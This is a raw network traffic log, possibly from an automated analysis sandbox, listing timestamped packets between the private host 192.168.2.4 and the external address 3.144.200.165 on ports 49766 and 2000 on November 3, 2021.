Nov 3, 2021 14:44:39.458973885 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.458987951 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.459014893 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.459017038 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.459032059 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.459038973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.459064960 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.459089041 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.459090948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.459103107 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.459112883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.459122896 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.459137917 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.459153891 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.459191084 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.501231909 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.501279116 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.501348019 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.501385927 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.508845091 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.508919954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.508953094 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.508976936 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.509057999 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.509087086 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.576396942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576437950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576505899 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576520920 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576535940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576555967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576575041 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576591969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576607943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576627016 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576643944 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576661110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576678991 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576695919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576711893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576730967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576746941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576765060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576782942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576796055 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576812029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576828957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576845884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576894999 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576908112 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576920986 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576935053 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576947927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576961994 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576975107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.576994896 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577013969 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577032089 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577045918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577064037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577076912 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577090025 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577106953 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577122927 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577138901 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577156067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577172995 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577191114 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577208996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577233076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577245951 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577258110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577270031 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577282906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577296019 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577308893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577322006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577316999 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.577338934 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577358007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577373028 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577389956 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577406883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577424049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577441931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577459097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577475071 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577491045 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577507973 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577524900 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577541113 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577558041 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577574968 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577590942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577608109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577625990 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577644110 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577661037 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577678919 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577696085 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577713966 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577732086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577753067 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577770948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577789068 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577805996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577824116 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577841043 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577857971 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577877045 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577894926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577913046 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577929974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577948093 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577965021 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.577980995 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.577981949 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578000069 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578016996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578033924 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578052044 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578068018 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578083992 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578102112 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578118086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578135967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578152895 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578170061 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578187943 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578205109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578222036 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578239918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578257084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578274012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578289032 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.578291893 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578309059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578326941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578346014 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578361988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578380108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578397036 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578413010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578430891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578447104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578464985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578483105 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578497887 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578516960 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578533888 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578551054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578551054 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.578568935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578586102 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578603029 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578622103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578638077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578655958 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578672886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578689098 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578707933 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578725100 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578742027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578758955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578764915 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.578777075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578795910 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578814030 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578830957 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578849077 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578866005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578882933 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578902006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578918934 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578937054 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578954935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578972101 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.578988075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579005003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579022884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579036951 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.579042912 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579060078 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579077005 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579092979 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579108953 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579127073 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579144001 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579159975 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579179049 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579195976 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579195976 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.579211950 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579229116 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579245090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579262972 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579278946 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579282999 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.579296112 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579312086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579328060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579345942 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579360008 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.579363108 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579379082 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579396963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579415083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579428911 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.579432011 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579451084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579467058 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579484940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579502106 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579505920 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.579518080 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579535007 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579551935 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579567909 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579585075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579602003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579618931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579636097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579653025 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579670906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579688072 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579693079 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.579705954 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579725027 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579741001 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579758883 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579777002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579793930 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579813004 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579828978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579848051 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579850912 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.579860926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579878092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579891920 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579905987 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579922915 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579941988 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579957962 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579977989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.579993963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580010891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580030918 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580048084 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580065012 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580081940 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580100060 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580112934 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580132008 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580131054 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580147982 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580164909 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580182076 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580199003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580215931 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580233097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580250978 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580267906 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580270052 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580284119 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580302000 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580317974 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580333948 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580351114 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580368996 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580385923 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580403090 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580419064 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580419064 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580436945 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580454111 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580473900 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580475092 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580487013 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580503941 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580521107 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580538034 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580555916 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580571890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580573082 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580590010 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580595016 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580607891 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580624104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580640078 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580656052 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580673933 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580691099 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580705881 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580724955 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580740929 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580765963 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580779076 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580782890 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580799103 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580816984 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580835104 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580872059 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580892086 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580909967 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580919027 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580928087 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580945015 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580960989 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580972910 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.580979109 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.580995083 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581012011 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581027985 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581043959 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581059933 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581060886 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581079006 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581094980 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581111908 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581127882 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581146002 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581159115 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581165075 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581182003 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581199884 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581216097 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581233025 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581238031 CET	49766	2000	192.168.2.4	3.144.200.165
Nov 3, 2021 14:44:39.581249952 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581265926 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581283092 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581300020 CET	2000	49766	3.144.200.165	192.168.2.4
Nov 3, 2021 14:44:39.581310987 CET	49766	2000	192.168.2.4	3.144.200.165
